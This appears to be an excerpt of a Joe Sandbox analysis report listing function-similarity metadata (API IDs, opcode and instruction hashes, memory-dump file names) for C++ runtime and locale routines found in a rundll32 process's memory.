                                                                                                                                                                                • Instruction Fuzzy Hash: 4141A431619E498FE754EF68D494BEE73F2FBA4314F54066EA44AC31A2DA70DC05C782
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.4141311297.000001E519090000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E519090000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_1e519090000_rundll32.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: std::_$LockitLockit::_$ExceptionFacet_RegisterThrow_lockmessagesstd::bad_exception::bad_exception
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 620047600-0
                                                                                                                                                                                • Opcode ID: 244ef1690acba6a5cb0dd3559b1bc5566f4c94bd989e195887cab2b3b6a165ed
                                                                                                                                                                                • Instruction ID: f4d91ef57a4bc46361448021cc9250e5873930c20132cd1e9fb0c72f853e610d
                                                                                                                                                                                • Opcode Fuzzy Hash: 244ef1690acba6a5cb0dd3559b1bc5566f4c94bd989e195887cab2b3b6a165ed
                                                                                                                                                                                • Instruction Fuzzy Hash: 0A41C53160DE494FEB55EB68D494BEE73F2FB64314F58066EA41AC31A1CA70D805CBC2
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.4141311297.000001E519090000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E519090000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_1e519090000_rundll32.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: std::_$LockitLockit::_$ExceptionFacet_RegisterThrow_lockcollatestd::bad_exception::bad_exception
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3240839640-0
                                                                                                                                                                                • Opcode ID: 76c8dbfefe16807c6c2e03d2c02e8fce80c7731968c8574b3a75b952f183e87e
                                                                                                                                                                                • Instruction ID: 03aec1e7ff4d2f84ff3304abe071c005cd8da84975f851239f761aca74a50f51
                                                                                                                                                                                • Opcode Fuzzy Hash: 76c8dbfefe16807c6c2e03d2c02e8fce80c7731968c8574b3a75b952f183e87e
                                                                                                                                                                                • Instruction Fuzzy Hash: 0041A43111DE584FE754EB28D895BEE73F2FB64314F54067EA85AC31A6CA30D805CB82
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.4141311297.000001E519090000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E519090000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_1e519090000_rundll32.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: std::_$LockitLockit::_$ExceptionFacet_RegisterThrow_lockmessagesstd::bad_exception::bad_exception
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 620047600-0
                                                                                                                                                                                • Opcode ID: 3d9e32fe7dd0b0532a8a56be85dacd11b9ba7591c2a82d48e1cf92cf00c2def1
                                                                                                                                                                                • Instruction ID: d419f612ec0254dd06e485d4fd0c6a8e658b15194ec5d1096d58f0e0c08c6917
                                                                                                                                                                                • Opcode Fuzzy Hash: 3d9e32fe7dd0b0532a8a56be85dacd11b9ba7591c2a82d48e1cf92cf00c2def1
                                                                                                                                                                                • Instruction Fuzzy Hash: 68416F31518E488FE755EB28D4C4BAE73F2FBA8314F58066DE45AD32A6CA34EC45C781
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.4141311297.000001E519090000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E519090000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_1e519090000_rundll32.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: std::_$LockitLockit::_$ExceptionFacet_RegisterThrow_lockcodecvtstd::bad_exception::bad_exception
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2666907392-0
                                                                                                                                                                                • Opcode ID: 786228c0cbaae2e5be0ca3ccd782fa5b01697f06a74618a99b9e5aa10a8d0d32
                                                                                                                                                                                • Instruction ID: 8c906c6a933b3a2865541c834f85cb97f2150286e6c4c148f918d80edcb371c5
                                                                                                                                                                                • Opcode Fuzzy Hash: 786228c0cbaae2e5be0ca3ccd782fa5b01697f06a74618a99b9e5aa10a8d0d32
                                                                                                                                                                                • Instruction Fuzzy Hash: 5C41A331109E594FE754EB18D494BDE73F2FB64314F55066EA85AC31B5CA30DC45CB82
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.4141311297.000001E519090000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E519090000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_1e519090000_rundll32.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: std::_$LockitLockit::_$ExceptionFacet_RegisterThrow_lockmessagesstd::bad_exception::bad_exception
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 620047600-0
                                                                                                                                                                                • Opcode ID: bc7c18e89f00e4146b619dee3e1b955b084c897949153250966cdf59237aa082
                                                                                                                                                                                • Instruction ID: b8f4c8c3f1b95cd6cd0a4eebadd57110b4b8bb0042bc89c23ac985055170f53e
                                                                                                                                                                                • Opcode Fuzzy Hash: bc7c18e89f00e4146b619dee3e1b955b084c897949153250966cdf59237aa082
                                                                                                                                                                                • Instruction Fuzzy Hash: 64419331508E484FE755EB28D4C4BEE73F2FBA8314F58066EA40BD32A6DA34D845C781
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.4141311297.000001E519090000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E519090000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_1e519090000_rundll32.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: std::_$LockitLockit::_$ExceptionFacet_RegisterThrow_lockmessagesstd::bad_exception::bad_exception
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 620047600-0
                                                                                                                                                                                • Opcode ID: e02caa4fb9f9f2feb070e3db7e870884112d88562d0c71a5ab28d0eb569987ff
                                                                                                                                                                                • Instruction ID: 42fb11aa2b909e6835842ef82dae62638310d76c6933a8940ab0ee83ccdd83eb
                                                                                                                                                                                • Opcode Fuzzy Hash: e02caa4fb9f9f2feb070e3db7e870884112d88562d0c71a5ab28d0eb569987ff
                                                                                                                                                                                • Instruction Fuzzy Hash: 70418231209E598FE754EB18D4947EE73F2FBA8314F54067EA44AC31A6CA34D845C782
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.4142231507.000001E51ADE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E51ADE0000, based on PE: true
                                                                                                                                                                                • Associated: 00000005.00000002.4142231507.000001E51AE88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_1e51ade0000_rundll32.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Locale_invoke_watson$UpdateUpdate::___updatetlocinfo__updatetmbcinfo_call_reportfault_getptd_malloc_crt
                                                                                                                                                                                • String ID: :
                                                                                                                                                                                • API String ID: 1584724053-336475711
                                                                                                                                                                                • Opcode ID: 604a302fabdb042f4ebc9b27cedb385bdeaebfe8a2c90ea295b00d5b5a1e0000
                                                                                                                                                                                • Instruction ID: cfebf43fe8cece4037cf2228bee5fe12dc9997c58a4568cc4a6743f2b02a3fca
                                                                                                                                                                                • Opcode Fuzzy Hash: 604a302fabdb042f4ebc9b27cedb385bdeaebfe8a2c90ea295b00d5b5a1e0000
                                                                                                                                                                                • Instruction Fuzzy Hash: F341CF32724B9481EB02AB26E80579D73E6F788BC8F899625DF5D0B746DE38D412C300
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.4142231507.000001E51ADE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E51ADE0000, based on PE: true
                                                                                                                                                                                • Associated: 00000005.00000002.4142231507.000001E51AE88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_1e51ade0000_rundll32.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Locale_invoke_watson$UpdateUpdate::___updatetlocinfo__updatetmbcinfo_call_reportfault_getptd_malloc_crt
                                                                                                                                                                                • String ID: :
                                                                                                                                                                                • API String ID: 1584724053-336475711
                                                                                                                                                                                • Opcode ID: f6eab2cf8d0451a383fcd1094c8bc586515c01fa06371aa533fca521f759249e
                                                                                                                                                                                • Instruction ID: f8faaacb3e393c6bcbf2dc303e01c77d1dbe0547db181761d300f71a79f18620
                                                                                                                                                                                • Opcode Fuzzy Hash: f6eab2cf8d0451a383fcd1094c8bc586515c01fa06371aa533fca521f759249e
                                                                                                                                                                                • Instruction Fuzzy Hash: DD41CE32724B9481EB02AB26E80579D33E6F788BC8F899225DF4D0B786DE34D412C300
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.4141311297.000001E519090000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E519090000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_1e519090000_rundll32.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Fgetc
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1720979605-0
                                                                                                                                                                                • Opcode ID: f74a844098648da67d21de2c32495390ab1c3596fe8d82436c96308467037ff2
                                                                                                                                                                                • Instruction ID: 3f6cbd1256c00ab02c5f0b4410ba4db8d6d56501f8ee7c32eddbedcc706c9857
                                                                                                                                                                                • Opcode Fuzzy Hash: f74a844098648da67d21de2c32495390ab1c3596fe8d82436c96308467037ff2
                                                                                                                                                                                • Instruction Fuzzy Hash: 12B11E31118FC98EE7A4EB28C4557EEB3F2FB94304F44491EA88EC3192DE759985CB46
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.4141311297.000001E519090000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E519090000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_1e519090000_rundll32.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: LockitLockit::_Mpunctstd::_std::ios_base::getloc$Stoulxstd::locale::locale
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1104148741-0
                                                                                                                                                                                • Opcode ID: 166b93a94447b86139d1c22adbbc14e30780d0c9cc7094b737ceab0ca3da017a
                                                                                                                                                                                • Instruction ID: 72e89eef24bbbc204f07008fa3a318e1b6a9e7d33678049fa1455be293c05060
                                                                                                                                                                                • Opcode Fuzzy Hash: 166b93a94447b86139d1c22adbbc14e30780d0c9cc7094b737ceab0ca3da017a
                                                                                                                                                                                • Instruction Fuzzy Hash: C9815031618E4C8FDB58EB6CD4857EEB3F2EB69705F44052DE84BD32A2DA30A8458781
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.4141311297.000001E519090000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E519090000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_1e519090000_rundll32.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: LockitLockit::_Mpunctstd::_std::ios_base::getloc$Stoulxstd::locale::locale
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1104148741-0
                                                                                                                                                                                • Opcode ID: 16286996adb80dee7d5b064b22652e5f05a5085a5d70cf9cb1c6c826df7b05ca
                                                                                                                                                                                • Instruction ID: 1e443927c61a6bd50af628ee34d603748bac5fd8e668fe604e15118aba7def43
                                                                                                                                                                                • Opcode Fuzzy Hash: 16286996adb80dee7d5b064b22652e5f05a5085a5d70cf9cb1c6c826df7b05ca
                                                                                                                                                                                • Instruction Fuzzy Hash: 64715035618E4C8FDB98EB68D4857EEB3F2FB99304F44052EE84AD3192DA30E845C781
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.4141311297.000001E519090000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E519090000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_1e519090000_rundll32.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: LockitLockit::_Mpunctstd::_std::ios_base::getloc$Stoulxstd::locale::locale
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1104148741-0
                                                                                                                                                                                • Opcode ID: 3d88c636a073cdcdd73c6a924e436b277ebbf35aadf33963d9bcfa329ff9a495
                                                                                                                                                                                • Instruction ID: 84aea16dedce4c3a750aa38cd034a85d25d47578a14059517215200441a28cd0
                                                                                                                                                                                • Opcode Fuzzy Hash: 3d88c636a073cdcdd73c6a924e436b277ebbf35aadf33963d9bcfa329ff9a495
                                                                                                                                                                                • Instruction Fuzzy Hash: 3271AF30718E4C8FEB58EB68D4467EDB3F2EB99314F54062DE84AD3192DE60A84587C2
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.4142231507.000001E51ADE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E51ADE0000, based on PE: true
                                                                                                                                                                                • Associated: 00000005.00000002.4142231507.000001E51AE88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_1e51ade0000_rundll32.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Fgetc
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1720979605-0
                                                                                                                                                                                • Opcode ID: af233356ab44033a1af5434a4fe9d0445c43cbdf01476d6f5b86da92ac9fc8ae
                                                                                                                                                                                • Instruction ID: 2af0fa505fb3689e584cbb010891263d9ac11704ccd3a48aa1d75881cc0638fc
                                                                                                                                                                                • Opcode Fuzzy Hash: af233356ab44033a1af5434a4fe9d0445c43cbdf01476d6f5b86da92ac9fc8ae
                                                                                                                                                                                • Instruction Fuzzy Hash: 18A12372209EC084EB62DB25F4513EEB3E2E7D5748F504125EA8D47A9BEF78C584CB40
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.4142231507.000001E51ADE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E51ADE0000, based on PE: true
                                                                                                                                                                                • Associated: 00000005.00000002.4142231507.000001E51AE88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_1e51ade0000_rundll32.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Lockitstd::_$Lockit::_Lockit::~_Mpunctstd::ios_base::getloc$Stoulxstd::locale::locale
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3293814644-0
                                                                                                                                                                                • Opcode ID: 1b6468ebf12914b2f0fe8338e001e18fabad8228a10c305a24cbb031952596d2
                                                                                                                                                                                • Instruction ID: 32a49e035fa0f8741a365975048ae48e6ceefbe1bac10c505547ea4f423b8257
                                                                                                                                                                                • Opcode Fuzzy Hash: 1b6468ebf12914b2f0fe8338e001e18fabad8228a10c305a24cbb031952596d2
                                                                                                                                                                                • Instruction Fuzzy Hash: 3F517932719E808AEB12DBA5E4407DE63E2F785B9CF404216EF591BB9ADE38C449C740
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.4142231507.000001E51ADE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E51ADE0000, based on PE: true
                                                                                                                                                                                • Associated: 00000005.00000002.4142231507.000001E51AE88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_1e51ade0000_rundll32.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Lockitstd::_$Lockit::_Lockit::~_Mpunctstd::ios_base::getloc$Stoulxstd::locale::locale
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3293814644-0
                                                                                                                                                                                • Opcode ID: ba231bb55e8ad13bb8c84fadf00820e2b831a140557f64e95a63da8dc5e447dc
                                                                                                                                                                                • Instruction ID: fda092c5d877cc90fd4ceacbaf8540786f59ea2d8293b202dafdd7991e771765
                                                                                                                                                                                • Opcode Fuzzy Hash: ba231bb55e8ad13bb8c84fadf00820e2b831a140557f64e95a63da8dc5e447dc
                                                                                                                                                                                • Instruction Fuzzy Hash: 11516932719E808AEB12DBA5D4407DE73F2F785B9CF404216EE5957B9ADE38C445C740
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.4142231507.000001E51ADE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E51ADE0000, based on PE: true
                                                                                                                                                                                • Associated: 00000005.00000002.4142231507.000001E51AE88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_1e51ade0000_rundll32.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Lockitstd::_$Lockit::_Lockit::~_Mpunctstd::ios_base::getloc$Stoulxstd::locale::locale
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3293814644-0
                                                                                                                                                                                • Opcode ID: fc64bed50a84d4864b71b968ac71fd66e0380d981a3e2c2678fe09f174b3caf6
                                                                                                                                                                                • Instruction ID: b4b88e34ceedc264ffa2adf891e430fbb2faf4c8c75e2d2e8add3018a0184109
                                                                                                                                                                                • Opcode Fuzzy Hash: fc64bed50a84d4864b71b968ac71fd66e0380d981a3e2c2678fe09f174b3caf6
                                                                                                                                                                                • Instruction Fuzzy Hash: 62519E32710F808AFB11DBA5E4407DE63F2F785BA8F445216EE591BB9AEE38C545C740
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.4141311297.000001E519090000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E519090000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_1e519090000_rundll32.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: std::_$LockitLockit::_$ExceptionFacet_RegisterThrow_lockstd::bad_exception::bad_exception
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1776536810-0
                                                                                                                                                                                • Opcode ID: 78f14f210944464f9e1e1c2a8d13bcf1eae8f7fb983aa7ce8c5333fa9df294e0
                                                                                                                                                                                • Instruction ID: 880e7450a293dd74114d3eb1f221ab52e2f57ca6817e62d0283163d5796d4a12
                                                                                                                                                                                • Opcode Fuzzy Hash: 78f14f210944464f9e1e1c2a8d13bcf1eae8f7fb983aa7ce8c5333fa9df294e0
                                                                                                                                                                                • Instruction Fuzzy Hash: F5419171119E484FE754EF18D894BEE73F2FBA8314F54066EA44AC31A6CA70E845CBC2
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.4141311297.000001E519090000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E519090000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_1e519090000_rundll32.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: std::_$LockitLockit::_$ExceptionFacet_RegisterThrow_lockstd::bad_exception::bad_exception
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1776536810-0
                                                                                                                                                                                • Opcode ID: 8201b41f25ef33c3613c1a68ee4a65115b9c88f9471d48fa011a91e106f7afff
                                                                                                                                                                                • Instruction ID: a821e0d5e1ee9cba6e5f6ece51ce4f6711a18c99048e9be5d384b0371f4d8093
                                                                                                                                                                                • Opcode Fuzzy Hash: 8201b41f25ef33c3613c1a68ee4a65115b9c88f9471d48fa011a91e106f7afff
                                                                                                                                                                                • Instruction Fuzzy Hash: BD419631119E498FE754EB18D494BEE73F2FBA4314F58096EA41AC31E6DA70D845CBC2
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.4141311297.000001E519090000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E519090000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_1e519090000_rundll32.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: std::_$LockitLockit::_$ExceptionFacet_RegisterThrow_lockstd::bad_exception::bad_exception
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1776536810-0
                                                                                                                                                                                • Opcode ID: bae5d00c57f016e6d8c0dc1a7b8c8c15f75d85941c89fc877493011a6d48aa01
                                                                                                                                                                                • Instruction ID: 413401c35c27b84fffee48cdbe3c81bf3d66df6f4a0e35284860ae671c2ea16c
                                                                                                                                                                                • Opcode Fuzzy Hash: bae5d00c57f016e6d8c0dc1a7b8c8c15f75d85941c89fc877493011a6d48aa01
                                                                                                                                                                                • Instruction Fuzzy Hash: C741B231509E488FF755EB28D481BEE73F6FBA4314F58095DD80AC31B5DA34D9418B82
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.4141311297.000001E519090000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E519090000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_1e519090000_rundll32.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: std::_$LockitLockit::_$ExceptionFacet_RegisterThrow_lockstd::bad_exception::bad_exception
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1776536810-0
                                                                                                                                                                                • Opcode ID: fb5e24ca2653538eeac2f84e8a1a1624b26305bbc8348ff8a181a437a36e0ba9
                                                                                                                                                                                • Instruction ID: deab46bb042d5a0a65fc80cf987b378b6a25b7780ca41a6bdc4b45b881e9e251
                                                                                                                                                                                • Opcode Fuzzy Hash: fb5e24ca2653538eeac2f84e8a1a1624b26305bbc8348ff8a181a437a36e0ba9
                                                                                                                                                                                • Instruction Fuzzy Hash: E641C330508E484FE755EB28D4C5BAD73F2FB64314F58056DA80AD32B6CA34D945CB81
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.4141311297.000001E519090000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E519090000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_1e519090000_rundll32.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: std::_$LockitLockit::_$ExceptionFacet_RegisterThrow_lockstd::bad_exception::bad_exception
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1776536810-0
                                                                                                                                                                                • Opcode ID: 83099b52044964ab2d8c21b0e66d69e068add0a1ffda037c7dbd6fda676a952f
                                                                                                                                                                                • Instruction ID: 5141e48bc2fa7869b88a77474c662c6629a288ed96ab1f94619b2131eb9e6b26
                                                                                                                                                                                • Opcode Fuzzy Hash: 83099b52044964ab2d8c21b0e66d69e068add0a1ffda037c7dbd6fda676a952f
                                                                                                                                                                                • Instruction Fuzzy Hash: FD41C531119E498FE764FB28E4957EE73F2FBA4314F54066EA45AC31A6CA70D805C7C2
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.4141311297.000001E519090000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E519090000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_1e519090000_rundll32.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: std::_$LockitLockit::_$ExceptionFacet_RegisterThrow_lockstd::bad_exception::bad_exception
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1776536810-0
                                                                                                                                                                                • Opcode ID: b9b3160839c62794a2f4426fd174e2d910c5656f38ad309ad83c3aeddb3b6001
                                                                                                                                                                                • Instruction ID: 828d3cc006a1f60b1d2b177127bb9ad4421c6a3dd71b2cf82f517ed4abd57f8c
                                                                                                                                                                                • Opcode Fuzzy Hash: b9b3160839c62794a2f4426fd174e2d910c5656f38ad309ad83c3aeddb3b6001
                                                                                                                                                                                • Instruction Fuzzy Hash: FE41B631109E898FE754EB18D8947ED73F2FB94314F54066EA44AC31A6CA74D845CB82
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.4141311297.000001E519090000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E519090000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_1e519090000_rundll32.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: char_traits
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1158913984-0
                                                                                                                                                                                • Opcode ID: 138815e70514d2f135f1c707d96a860ed4914229c68fb56bc0cde8100c9a4ae3
                                                                                                                                                                                • Instruction ID: a4bd31d3e283cab9b122072194d06c1c67a2f6b069d43947a84347f743063e2c
                                                                                                                                                                                • Opcode Fuzzy Hash: 138815e70514d2f135f1c707d96a860ed4914229c68fb56bc0cde8100c9a4ae3
                                                                                                                                                                                • Instruction Fuzzy Hash: 80411A31118E868AE748EB25C4517EEB3F2FF95348F88091DED8EE71E2DA25D944C702
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.4142231507.000001E51ADE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E51ADE0000, based on PE: true
                                                                                                                                                                                • Associated: 00000005.00000002.4142231507.000001E51AE88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_1e51ade0000_rundll32.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ByteCharLocaleMultiWide$UpdateUpdate::__errno_isleadbyte_l
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2998201375-0
                                                                                                                                                                                • Opcode ID: 1d846ac782697e1626f60741b10654be5d980ecfef08fe52ee6ab297ca0a43db
                                                                                                                                                                                • Instruction ID: 77e6c5e6861cdaffa657b4546fad631a516e7588b55c3033b0b9d3a56c0cc829
                                                                                                                                                                                • Opcode Fuzzy Hash: 1d846ac782697e1626f60741b10654be5d980ecfef08fe52ee6ab297ca0a43db
                                                                                                                                                                                • Instruction Fuzzy Hash: 2141C272218BD086EB62AF15D1807AD7BE6F784B8CF144225EF895BB96DB39D8418700
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.4142231507.000001E51ADE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E51ADE0000, based on PE: true
                                                                                                                                                                                • Associated: 00000005.00000002.4142231507.000001E51AE88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_1e51ade0000_rundll32.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: char_traits
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1158913984-0
                                                                                                                                                                                • Opcode ID: efd17d778424b9709a2ebecd350b9a00f791cf1ba8a6ebccbfb2f640782f2fd7
                                                                                                                                                                                • Instruction ID: 5ec285f9fc996a44fee33190f0b3f67ef6b65efde666abc33e4003aecd93de97
                                                                                                                                                                                • Opcode Fuzzy Hash: efd17d778424b9709a2ebecd350b9a00f791cf1ba8a6ebccbfb2f640782f2fd7
                                                                                                                                                                                • Instruction Fuzzy Hash: 9241D136218E8180EB52E775E4513EE63F2FBD578CF900011FA8D876ABEE39C9858740
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
